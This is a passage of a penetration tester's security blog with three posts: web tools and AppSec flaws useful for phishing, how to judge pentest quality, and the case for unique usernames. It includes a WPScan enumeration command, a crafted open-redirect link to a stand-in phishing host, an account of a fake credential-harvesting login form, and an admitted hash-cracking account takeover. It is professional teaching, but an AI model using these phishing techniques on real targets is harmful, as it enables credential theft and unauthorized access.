  • HTTP_Screenshot (SpiderLabs)
This is an oldie but a goodie.  If you can get past the dependencies to install successfully (PhantomJS, etc) then it's worth it.  This is an Nmap NSE script, so you can run it during host and service enumeration to get a separate image file (PNG) created for each web service, from the perspective of a browser.  I always use this for penetration tests so I can quickly look through the web services to determine if there's a web portal I want to target manually.  This is especially useful when your target is a web development or web hosting company and there are a good deal of web services in the environment.
  • Burp Importer
I love this one.  On my team we use Nessus as one of many tools in our arsenal, but we really leverage it mostly for host and service discovery.  The .nessus file type that you can export is really just an XML file under the hood.  This Burp Suite Professional Extender plugin is really nice in that it imports all relevant web services by IP and Port into the Burp Sitemap via the Nessus output.  It makes adding them to your Target and spidering/scanning really quick and convenient.
  • DirBuster / Burp Content Discovery
Because most web services detected will be by the IP address and port, the default web path may not be known.  Instead, you may get a default IIS/Apache landing page or a 403 Forbidden response code.  Even if you do get a valid page, it's possible there are other "hidden" paths or files uploaded to the web directory that shouldn't be accessible, so using a tool like Burp's Content Discovery or OWASP's DirBuster is a great way to find what others may have missed. 
  • WPScan
This is true for any Content Management System (CMS), but Wordpress especially is a goldmine for security issues, typically due to a lack of patching around libraries, themes, and plugins.  WPScan is an excellent tool for quickly identifying the version and the vulnerable components, as well as enumerating and brute forcing user accounts.  A sample invocation follows this list.
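As a quick illustration, a typical WPScan run to fingerprint the WordPress version and enumerate vulnerable plugins and user accounts might look like this (hypothetical URL):

```
wpscan --url https://blog.example.com --enumerate vp,u
```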

Round 2: Phishing


I never do phishing without doing some AppSec up front.  It's come in handy more times than I care to count.  Most AppSec vulnerabilities that are useful for phishing involve being able to host content in the target's own environment so that URLs can be crafted to look like they originate from the legitimate domain.  Here are the ones I'm specifically looking for:
  • Open Redirects
Open Redirect vulnerabilities (via GET requests) allow the attacker to craft a URL that originates from the target domain but redirects via a 302 response code to a third party domain of their choosing. This technique is often used by attackers in the real world, and for good reason: it's very difficult for a user, even with security awareness training, to spot the fake request since they recognize the domain (see the example link after this list). This, and the techniques below, often sail right past web content filters and spam filters as well. Attackers can even obfuscate the redirect parameters at the end of the URI by using URL encoding, making it that much more difficult to spot as a fake.
  • Unrestricted File Upload + Insecure Direct Object Reference (IDOR)
During a penetration test for a large university, I leveraged a combination attack where the school had student printing services with an unrestricted file upload vulnerability.  I was able to bypass the client-side content-type filters to upload an HTML file instead of a DOCX file.  In addition to this, they had Insecure Direct Object Reference issues, and it was trivial for me to locate and craft a URL to access my uploaded HTML file.  Compounding the issue further was the fact that no authentication was required, so what I now had was my own site hosted on the .edu domain, which is otherwise difficult to spoof since .edu top-level domains are off-limits to the general public.  As you can imagine, it was easy from here to set up a fake login form that posted credentials to my own third party site and redirected the unknowing victim on to their post-authentication resource.
  • Cross Site Scripting (XSS)
Cross Site Scripting vulnerabilities are yet another way to control the content hosted on the phishing recipient's own domain.  By injecting HTML into the page by means of XSS, it is possible to alter the content of forms.  Additionally, if the X-Frame-Options security header is missing in the web service's configuration settings, it's possible to create a full-frame iframe and completely redesign the vulnerable target site, hosting your own content.  If this is stored or reflected XSS, you can craft a URL to your page and email the link to your victim.
  • Remote File Include (RFI)
RFI vulnerabilities are ways to include, or reference, external resources.  Sometimes this can be JavaScript, server-side scripting pages, or just a static HTML page.  RFI is another example of potential content modification, making it possible to craft a URL originating from the legitimate victim's domain but actually pulling content from an attacker-controlled server.
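To make the open-redirect example above concrete, a crafted link might look something like this (hypothetical domains; note the URL-encoded destination at the end):

```
https://trusted.example.com/login?next=https%3A%2F%2Fphish.example.net%2Fportal
```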

DING DING!  And Our Winner Is...


Hopefully this blog serves to help those who don't typically take an in-depth look at web applications during phishing or penetration testing activities.  If you already do this, great!  Keep it up!  I likely missed some examples and vulnerabilities that can be used in this manner, so please let me know if you have something to add so we can all improve. 😃  Dynamic Application Security Testing can stand on its own as an excellent service, but it's unique in that it can also serve as a teammate to these other services, much like Mickey is to Rocky.  Until next time!  (Cue Eye of the Tiger Music)


- Curtis Brazzell

June 06, 2019

Not Just a Vuln Scan - Are You Receiving/Providing Quality Security Assessments?


Intro


Having a diverse background in Information Security has given me what I think is a unique perspective on both the receiving end and the giving end of technical security assessments.  In sales support roles, I'm always trying to understand and get to the bottom of exactly what our customer most needs.  There's something really rewarding about translating technical jargon and bridging the gap between sales and executive-level decision makers.  It may sound cliche to say, but I honest-to-goodness have a passion for helping people find the most value in these assessments and walk away from them more secure than they were before engaging with our team.

Similarly, it really irks me to my core when I come across a statement of work or the results of a previous assessment that was performed in a way that does not maximize the effectiveness of said assessment.  With so many technical service offerings available and different organizations providing these services, it's hard to fault the customer, or even the sales person, who may simply struggle to understand them fully.  Perhaps there's a limited budget available and services weren't properly prioritized.  This is why it's so important to have a technical resource available during the beginning phases of sales conversations, even though most of us in this field just like to focus on delivery.  Today, just about everyone offers a Penetration Test, but testing methodologies are not always standardized and sadly, some aren't even a pentest by definition!

In this blog I hope to lay out some ways in which as a customer you can help ensure you're getting a quality assessment.  If you're a technical resource, I also hope to help outline ways in which you can make sure you're offering the right assessment and delivering consistent, actionable results which are valuable to your customer.

Some Definitions


Since I mentioned penetration testing, let's go there.  A question I often get, as I imagine most of you readers do as well, is, "What is the difference between a penetration test and a vulnerability scan?"  Don't feel bad asking this if you don't know, because sadly, many sales and technical people offering these services don't seem to know either.  There's also red teaming.  It's important to know what you're getting for your money, but it's even more critical when dealing with PCI, because a vulnerability scan won't fulfill the council's requirements and could leave you failing compliance.

I'm probably going to over-simplify this definition for many, but simply put, a vulnerability scan is a passive or active scan of hosts and services to identify vulnerabilities and their severity, impact, and risk to the organization.  There is a lot of value in a vulnerability scan, as it helps you proactively identify and resolve potential patching deficiencies and configuration issues before an attacker does.  It also complements your patch management process to ensure patches aren't being missed.  However, this by itself is not a pentest.

A traditional network penetration test (pentest) is the act of exploiting or validating these vulnerabilities with the intent to demonstrate the impact to the organization.  Other tools and techniques can be used to simulate what an attacker may do, going further than just a single scan.  It's worth noting that both vulnerability scans and penetration tests may or may not include web applications.  Some focus on web applications specifically, often referred to as a "Web Application Pentest" or an "Application Security Test".

Lastly, a red team is essentially a penetration test but with the intent of simulating an attacker targeting the environment directly.  This is often done in an opsec-friendly way to "stay under the radar" and avoid detection by defensive teams and technologies.  There's also more reconnaissance up front, since the scope of and access to the environment aren't likely to be provided by the customer.

Rant


Now we should all know at a high level what the differences are between these services.  However, you'll see that not all pentests are created equal.  If you're looking at penetration testing quotes, keep in mind that you're most likely not comparing apples to apples, so going with the most affordable doesn't necessarily mean it will satisfy all of your requirements.  Now, if you're looking to "check a box" to meet compliance regulatory requirements or to satisfy your customer requests, you may be okay with a basic "out of the box" assessment.  Keep in mind that there are firms (I've seen the service contracts) that offer a vulnerability assessment but call it a penetration test, I can only assume in order to offer competitive pricing.  If you come across one of them, please point them to this blog. 😉

Sampling


Something I came across recently was an outsourced pentest that had already been sold.  It's not uncommon to find a limited scope, with the intent to do a sampling of assets in the environment due to budget or time constraints.  I have my own opinion about sampling when it comes to penetration testing (don't do it!).  Essentially, an attacker will often find the easiest path in, the weakest link.  If you miss it because you didn't look at everything at least once, you're not doing yourself any favors.  This particular SOW stated that about 5% of the environment would be tested every quarter, for a year.  This included vulnerability scans as well, with the same scope.

I understand wanting to limit the cost, but in this situation it would be better to take that same investment and put it towards a vulnerability scan of the ENTIRE environment, then focus the penetration testing on critical assets and the highest severity findings from the vulnerability assessment.  If the pentest can only be done twice a year, that's better than four very limited tests.  The way this was set up, they'll never have a complete picture of their environment at any one point in time.  Had I been involved from the beginning, or had this been Pondurance offering the service, I would have made these suggestions to the customer in a pre-sales conversation.

Frequency of Testing


I just touched on it in the last paragraph, but the frequency of testing can play a role in the thoroughness and efficiency of an assessment.  It is commonly recommended to perform a penetration test about twice a year.  This is due to the dynamic nature of enterprise environments and the frequency with which security vulnerabilities are introduced into any system.  How much is too much, though?  I'd rather see a comprehensive penetration test once a year than two or even four "budget" pentests.  Attackers are financially motivated, and if they're targeting a specific organization, time is often not a constraint for them.  Consultants, on the other hand, are constrained by time.  A good penetration tester will make the best use of their time, manually digging and looking for unique opportunities to move laterally and compromise credentials and hosts along the way.

If you decide you do want frequent tests, make sure you're not being overcharged either.  The first assessment should have more time allocated to it, with subsequent ones benefiting from the familiarity and experience gained with the environment.

Maturity / Security Posture


Another common gotcha I see is when a customer or the sales person tries to put the proverbial cart before the horse.  You can't run before you can walk.. I'll spare you the rest. 😃  Sometimes I wonder what my own sales team thinks when I'm in a scoping meeting and I'm actively reducing the scope of our services.  Fortunately, my team at Pondurance is as passionate as I am about helping our customers, so they've always been cool (at least in person!) about my stepping in and altering course.  Many customers bring this on themselves, assuming the best place to start their security journey is to go all out and do a red team assessment.

I often offer a lower cost but more effective first step, such as a security architecture review (gap analysis) or perhaps a vulnerability management program.  Similarly, we offer a penetration test with every vulnerability management program offering.  Many customers initially want the pentest first, followed by monthly external scans and quarterly internal scans.  I always push back on this and instead suggest we do the pentest at the end of the program.  What value is there in an easy pentest demonstrating the environment is full of holes?  It's like shooting fish in a barrel, an easy win for the tester.  Wouldn't there be so much more value in waiting a year while the customer receives their scan results and works on remediation throughout that time?  Then, when they feel they've done everything they can to protect themselves, we test that defense by simulating a real-world attack.


Things to Look For


Pre-Engagement Red Flags


One of the earliest indicators when assessing a new partner for security assessments is the questionnaire.  This is the document, or form, that the sales representative uses to help scope the engagement appropriately.  This document should be pretty telling for how and where they put their emphasis on time.  While it's true that the number of IP addresses or URLs helps provide a baseline estimate for determining how much time an assessment may take, there should be follow-up qualifying questions to gain more context around those.  How are those assets accessible?  Does a /24 subnet REALLY have all 254 IP addresses in use, or are you paying too much when there are just a handful of hosts within it?

Are they simply quoting you for everything you ask for, or do they want to discuss your end goals with you in order to better serve your needs?  This also shouldn't be a meeting to throw more stuff at you, but rather a conversation about the bigger picture to ensure the right services can be offered.  As I mentioned above, this can result in a reduction in scope.  If it's right for the customer, it should be right for the firm.


Ask about testing methodologies and frameworks.  Does their testing include manual work, or is it purely automated?  Are they following a standard process such as the Penetration Testing Execution Standard (PTES)?  Is there a quality assurance component for both the technical work and the deliverable?  What does the deliverable look like?  Can you see a redacted version?  Are their reports actionable, with clear recommendations, rather than just a regurgitation of every issue dumped into your copy?

Lastly, and probably most obvious, is the Statement of Work (SOW).  Does this contract clearly define the testing process and expected deliverable formats?  Does it specify the project management component?  Exactly how much time is dedicated to manual testing versus automated scanning?  Are they charging time for tools to run?  Are compliance tests called out with their specific requirements?  Is retesting something you're expecting, and is it a separate line item?  What are their data retention periods?  There have been some big security vendors in the news recently for breaches that resulted in sensitive client data being exposed.  *cough* Hacking Team *cough*

Engagement Red Flags


Once the engagement is sold, is there a kickoff meeting to discuss expectations around timing, the testing process, and delivery, and are these things discussed in detail?  Are the rules of engagement specifically called out and covered in depth?

Something I've found from my experience as a Systems Administrator on the receiving end of a penetration test is that you may have certain expectations for findings.  For example, I was at an organization where we had certain service accounts we knew needed to be transitioned, as well as some unsupported operating systems we had scheduled to retire.  I specifically looked for these results in the penetration test report as a quick sanity check to make sure the testers were at least finding the low-hanging fruit.

Ironically, as a tester I'm always concerned the client is doing the same to me, and they should!  It's a great way to check my work, and it challenges me to find everything I can.  No pentester can ever find everything, but again, the low-hanging fruit should be discovered and exploited if possible.  I wonder how many of our customers have had honeypots and I just didn't know it. 😅  Although this could be seen as a waste of time, it's yet another way to measure the effectiveness of your red team.  I've also been pitted against a blue team SOC and blacklisting security devices, which made me think carefully about how I was going to do my passive information gathering and fly under the radar.  From there we get into purple-team operations, where we can test the effectiveness of both teams and use the results as a training opportunity for each!

Post-Engagement Red Flags for Future Consideration


It may be difficult to determine the quality of the test based on the results alone.  After all, clients typically aren't as technical in the same areas as the company providing the testing services.  However, the quality of the report should be obvious.  Does it do a good job of breaking down the main issues in a prioritized, easy-to-understand executive summary?  Does it also give enough technical detail that the responding IT department can resolve the issues being raised?

Does their deliverable contain screenshots as evidence of the exploited vulnerabilities, and are they effective in demonstrating the risk posed?  Are there other supporting data files from tool outputs, such as vulnerability scan dumps, tool state files, and raw stdout?  Are they willing to share a list of all the tools used during the assessment?  Part of the value of an assessment may be education on those tools and processes, which can feed internal training.  A big part of what I do in Dynamic Application Security Assessments is provide Burp Suite Professional project state files so the developers can load the findings into their own tools, replay the payloads, and verify on their own that the issues were resolved.  I've even had the sales team, in some instances, add an ad-hoc training session for an entire team, tacked on to the end of the review meetings.

Speaking of review meetings, this, in my opinion, is the most valuable part of the engagement for the customer.  It should be offered a week or two after the results are provided, to allow time for the customer to digest them and form questions.  Are they conducting these as personally as possible?  These should be done face to face when feasible, in an open-floor presentation style that allows for healthy back-and-forth dialogue.  It's an opportunity to really utilize the advisory resources the consultancy has to offer, asking questions and making sure everyone's on the same page regarding remediation.  Lastly, is the project closed as soon as the review meeting ends and the invoice is paid, or do they offer to answer lingering questions afterwards?  I always personally offer this, even knowing there may not be billable time left in the budget, because I see the value in helping customers who, in all likelihood, won't get around to resolving the huge list of issues you dumped into their laps until after the project is finished.

Conclusion


This is by no means a comprehensive list of things to do and look for when shopping for or offering security services.  These are just a few things I see regularly, and since I have a passion for making sure people get the most "bang for their buck," I wanted to share them with the community as well.  I think we can all do a better job, as the technical delivery and sales teams, of meeting our customers' needs, and I strongly believe developing that quality reputation goes a long way toward the overall success of the business.  A lot of that comes down to communication up front, and not assuming our customers know what's best for themselves.  We need to listen when they want something specific, but they're also hiring us to be their trusted advisors.

Please share any other thoughts and ideas!  I'd love to hear how people are testing their testers.  😄

- Curtis Brazzell






May 01, 2019

OSINT Recon Great? - Unique Usernames Are Better Than Unique Passwords

Using Blur to Create Unique Emails/Usernames

Intro


Happy World Password Day! Yes, this is an opinion piece. No, I'm not saying passwords are unimportant. The title is meant to be bold, to encourage debate and bring awareness to the topic. If anything, I believe usernames are just as important as passwords when it comes to privacy and security. This is something I've been practicing personally for ten years now, and it has worked well for me. Please hear me out and wait to tell me how wrong I am until after you've read the entire article. 😛 Passwords have been talked about in the information security space practically to the brink of extinction. We still have to live in a world where credentials are the primary form of authentication online, for now. Big steps are being taken to get rid of the need for passwords, but they're here to stay for a while. Sorry, passwords, I know today is your day.

Credentials typically consist of an email address or username, a password, and ideally another form of identification such as a security token or push notification, known as Two-Factor Authentication (2FA).  So why, then, are we always talking about passwords and 2FA?  We almost never talk about usernames, and in my opinion they're just as important in a security context, if not more so, than their notorious counterpart.  They're like the R2-D2 of authentication, while C-3PO always gets the gold!  (Auth-2D2)

Please understand me: I'm certainly not advocating we use weak passwords, just that the importance of usernames is often overlooked.

R2 Authenticating Into Jabba's Palace

Now that your eyes have returned to their normal, non-rolled position, let's talk about why I feel this way.  Hint: it's OSINT.

Reasoning


I've previously spoken about Open-Source Intelligence (OSINT) tools and the reconnaissance phase in my Phishing article, so I'll do my best to avoid any redundancy here.  A lot of those tools are designed to target a company or a domain first and then find information on the individuals associated with it.  However, sometimes an attacker is targeting an individual instead of an organization from the start.  Popular targets in the real world are usually victims who have a personal connection to the attacker, or high-profile people such as celebrities or politicians.  The technical goal of the attacker may be to gain unauthorized access to resources as that individual, or to violate their privacy by discovering browsing habits and the sites they belong to.  The end goal could be to humiliate and expose the victim, or to profit financially from that access.  I'll admit that in my past I had to put the grey hat back on and dig up a LinkedIn breach hash, crack it, and use Facebook SSO to get into other accounts in order to geolocate an IP address for someone in the family who had gone missing.  We were concerned for their safety, truly.


By now, just about everyone who uses the Internet knows that a strong password is a better idea than "123456" for their Chase account.  This has been a long, brutal lesson, and some people are still catching up.  A newer, but still relatively old, concept in security is to use unique passwords that are different for each site you have an account on.  This is great, as long as it's done properly.  Using a password manager instead of 20 post-it notes on your desk is the preferred way to do this, in case you were wondering.  (I, like many others before me, have seen the post-it approach on physical penetration testing engagements!)  If this is you, crumple them up after converting them to a password vault like KeePass, 1Password, or LastPass, and throw them in the shredder.  For the rest of you, great job on keeping your passwords safe and unique!


Great!  Now that all of us have a different set of credentials for every site we belong to, let's talk about why it's important to do this.  I'll keep it brief because it's not a new concept, but it's worth explaining given the importance of the topic.  "Credential stuffing" is the term for when an attacker gains access to a list of usernames and passwords, typically through a breach leak, and tries them against other sites and services to see where people have reused passwords.  Not us!  However, many people do, and attackers have tools such as Snipr which can quickly and effectively check which other sites those credentials work on.  Sites such as haveibeenpwned.com allow users to check whether their accounts have been compromised, and even be alerted when it happens.  If someone is targeting you specifically, the same technique applies, except they won't be waiting on random hits to let them in; they'll be using your leaked password directly.

HIBP Breach Leak Lookup by Email
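
Related to HIBP: you can check your passwords the same way, without ever sending them anywhere.  Below is a minimal sketch (Python, standard library only) against the public Pwned Passwords range API; thanks to its k-anonymity design, only the first five characters of the password's SHA-1 hash ever leave your machine:

```python
# Check a password against HIBP's Pwned Passwords range API.
# Only the first 5 hex chars of the SHA-1 hash are sent (k-anonymity).
import hashlib
import urllib.request

def breach_count(password):
    """Return how many times this password appears in known breaches."""
    sha1 = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    prefix, suffix = sha1[:5], sha1[5:]
    url = f"https://api.pwnedpasswords.com/range/{prefix}"
    with urllib.request.urlopen(url) as resp:
        # Each response line is "HASH_SUFFIX:COUNT"
        for line in resp.read().decode().splitlines():
            candidate, _, count = line.partition(":")
            if candidate == suffix:
                return int(count)
    return 0

if __name__ == "__main__":
    print(breach_count("123456"))  # a depressingly large number
```

Unlike the per-account breach lookups, this range endpoint requires no API key, which is part of why so many password managers use it for their built-in breach checks.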

Someone using a credential stuffing tool, or any number of OSINT tools, can still learn a lot about you if they're trying to build an online profile of their target.  Think about it: your email address or username is likely to be the same on every website you're registered with.  After all, the username just identifies you; it's your password that verifies your authenticity, or is supposed to, and says you are who you say you are.  Would you care if all of the sites you're registered on were publicly searchable by anyone who wanted to look into your life?  People could build a pretty good profile of you: whether you go to church, where you bank, what hobbies you have, groups you belong to, social media accounts, etc.  Maybe you don't want all of that out there?  The Internet is not forgiving, after all; it archives a mind-boggling amount and has an almost infinite retention period.  Just Google your email address and see what pops up, and that's only what a non-attacker would use to dive into your story.  The Ashley Madison scandal comes to mind, and the people who were "outed" because they didn't expect a cybersecurity breach to give them away.  Having complex passwords didn't help them.  It's not that I'm condoning that service, but I believe in privacy for all.  Why not create "throwaways" for every site you belong to?

Usernames and email addresses aren't necessarily synonymous.  Maybe I want my username to be publicly known for a social media account.  For example, my Twitter username is @CurtBraz.  Anyone can see that, and I don't want to mask my identity there; that's a risk I choose.  However, I still have a uniquely masked email address that's required for me to log in, in addition to a strong and unique password.  If someone tried to brute force my password, they would first need to know that email address, which shouldn't be accessible in most cases.  And even if someone got hold of it for some reason and wanted to get into my email account, they'd have no idea what the underlying real email is.

Even if my password weren't unique and I reused it everywhere, an attacker would still run into the same problem.  Staring at a breach list of credentials, you might have my password for Twitter, but you couldn't use it anywhere else I have an account, because you can't tell which other accounts are mine.  This is the point I hope to make.

Snipr Config Hits

Recommendations and Conclusion


So what can we do to protect our privacy?  Something we always preach from an application security perspective is that sites should not disclose whether a username exists when a password is incorrect or a reset request is initiated.  Instead, they should respond with a generic message like, "This username or password combination does not match any known records."  That being said, a lot of popular sites don't follow this practice.  CAPTCHA isn't foolproof, but it is another deterrent against bots or scripts attempting to automate these attacks.  For any developers or site administrators reading this, you can help your users by following these simple practices; a sketch of what that looks like is below.  Additionally, content from forums and discussion threads is spidered and indexed by search engines, which can expose usernames this way as well.
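
To make that concrete, here's a minimal sketch (Python with Flask and a hypothetical in-memory user store; a real application would use a database and a dedicated password-hashing library like bcrypt or argon2) where the response, and roughly the timing, is identical whether the username is unknown or the password is wrong:

```python
# Minimal sketch of an enumeration-resistant login endpoint.
import hashlib
import hmac
import os

from flask import Flask, jsonify, request

app = Flask(__name__)

def hash_pw(password, salt):
    """PBKDF2 stand-in for a real password hash."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

# Dummy credentials get hashed for unknown usernames too, so the work
# (and therefore the response time) is roughly the same either way.
DUMMY_SALT = os.urandom(16)
DUMMY_HASH = hash_pw("placeholder", DUMMY_SALT)

_salt = os.urandom(16)
USERS = {"alice": (_salt, hash_pw("correct horse battery staple", _salt))}

GENERIC_ERROR = "This username or password combination does not match any known records"

@app.post("/login")
def login():
    data = request.get_json(silent=True) or {}
    username = data.get("username", "")
    password = data.get("password", "")
    salt, stored = USERS.get(username, (DUMMY_SALT, DUMMY_HASH))
    valid = hmac.compare_digest(hash_pw(password, salt), stored)
    if username not in USERS or not valid:
        # Identical message whether the user is unknown or the password is wrong.
        return jsonify(error=GENERIC_ERROR), 401
    return jsonify(status="ok")
```

The same generic-response rule applies to password reset flows: "If that account exists, we've sent an email" beats "No account found with that address."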

This advice is for everyone else, the "users."  Consider using unique, unidentifiable usernames and email addresses when registering online.  Some people take it even further, depending on their privacy needs, and "mask" other information such as credit cards, names, and physical addresses.  For the purpose of this blog I'm only referring to usernames and emails.  Even if your password is disclosed in a breach and you're an avid password reuser, no one will know which account is yours to try the password against.  Of course, they could still run a dictionary attack and force their way in eventually, which is why it's good to follow both practices.  Also, a unique email or username, as opposed to only a unique password, makes it extremely difficult to identify you as having an account on a given site.  If I were to take your one known email address and run it through an OSINT tool, I would only find the one site it belongs to.  I wouldn't get a pretty visual map, like I do in Maltego, of what other services I can try my leaked credentials on.

Maltego Example of User Recon

I personally use a browser plugin called "Blur" (formerly known as DoNotTrackMe) which does an awesome job of integrating into Chrome form fields and offering to "mask my email."  See the image at the top of this article for an example of creating a new account on AWS.  I use the same format for usernames.  I then leverage KeePass for unique passwords, but you can use any password manager you like, even Blur or your browser itself.  Most password managers will reference the HIBP API to make sure your passwords haven't already shown up in a breach.  This lets me quickly and easily create throwaway emails I can use for authentication while protecting my real email.  As a plus, it effectively cuts off unwanted spam by letting me turn off the forwarding service, and it blocks trackers.  There are other services you can use for disposable email address and username generation, such as Guerrilla Mail.  Even Gmail allows you to create email aliases by simply adding a plus sign.  If your email address is curtis.brazzell@gmail.com, you can create one on the fly at a cash register in a store, such as curtis.brazzell+gamestop@gmail.com, and your emails will still be delivered.  What you've effectively done is create a unique account name that hackers won't easily recognize as yours in a breach list, but that is still recognizable to you.  You can also determine which sources are sharing your address with third parties this way!  Of course, someone could figure out your naming convention, so you may want something more random.
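
If you want to script this yourself, here's a toy sketch (Python; the addresses are just the examples from above) showing both the recognizable plus-alias and a more random variant:

```python
# Toy sketch of per-site email aliases using plus-addressing.
import secrets

def plus_alias(base, site):
    """Readable alias: easy for you to recognize, and it reveals
    which site leaked or sold your address."""
    local, _, domain = base.partition("@")
    return f"{local}+{site}@{domain}"

def random_alias(base):
    """Random tag instead of the site name, for when the naming
    convention itself shouldn't be guessable.  Record the mapping
    in your password manager alongside the password."""
    local, _, domain = base.partition("@")
    return f"{local}+{secrets.token_hex(4)}@{domain}"

print(plus_alias("curtis.brazzell@gmail.com", "gamestop"))
# curtis.brazzell+gamestop@gmail.com
print(random_alias("curtis.brazzell@gmail.com"))
# e.g. curtis.brazzell+b3f91c7a@gmail.com
```

Note that plus-addressing only obscures the mapping; stripping everything after the "+" trivially recovers your real address, so anyone grepping a breach list for your base address can still link the accounts.  Truly random masked addresses, like the ones Blur generates, don't share that weakness.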

My KeePass Database 
(Now I'll Have to Change it Again) 😋


Guerrilla Mail Disposable Emails 
(Shark Lasers is a Freaking Awesome Domain, BTW)


Blocked Blur Email


With the advent of open and centralized authentication services like OAuth and Auth0, things are changing a bit.  There's still a balance in my mind when using these services.  On one hand, all of your memberships are tied to one or a few providers (Facebook, Twitter, Google, etc.), and as long as that account is secure, your others should be as well.  Registering this way is one less username and password you have to deal with.  On the other hand, you're putting all of your eggs in one basket when you think about account takeover, and you're using the same username everywhere.  There's always the potential that the provider itself could be breached, even Google!  My personal approach is to mix it up: I use Single Sign-On (SSO) for less important resources, and for more private ones I register directly with the site.

Because a unique email makes it difficult for an attacker to brute force my account in much the same way a password does, and because it has the added benefit of making it difficult to target or identify me, I think it's just as important, if not more so, than a uniquely strong password.  It's a form of security by obscurity.  Again, both are recommended, but I think unique and complex usernames should be a standard, something I rarely see today.  Security is all about layering, and although I know security by obscurity isn't a solution on its own, it's yet another layer to strengthen your security posture when used properly.
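
To put a rough number on that intuition (a back-of-the-envelope calculation, assuming the eight-hex-character random tags from the sketch above):

```python
# Back-of-the-envelope: a random 8-hex-char alias tag adds ~32 bits
# an attacker must guess before they can even start on your password.
import math

tag_space = 16 ** 8          # 8 hex characters
print(f"{tag_space:,}")      # 4,294,967,296 possible tags
print(math.log2(tag_space))  # 32.0 bits of extra search space
```

That's roughly the same search space as tacking five or six extra random alphanumeric characters onto your password, except the attacker has to burn those guesses before they even know whether an account exists.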

As always, I encourage discussion and healthy debate on the topic.  Please let me know why you do or don't agree!  I write these blogs to help the community, but also to advance my own understanding by hearing from you knowledgeable readers.  Thanks so much!

- Curtis Brazzell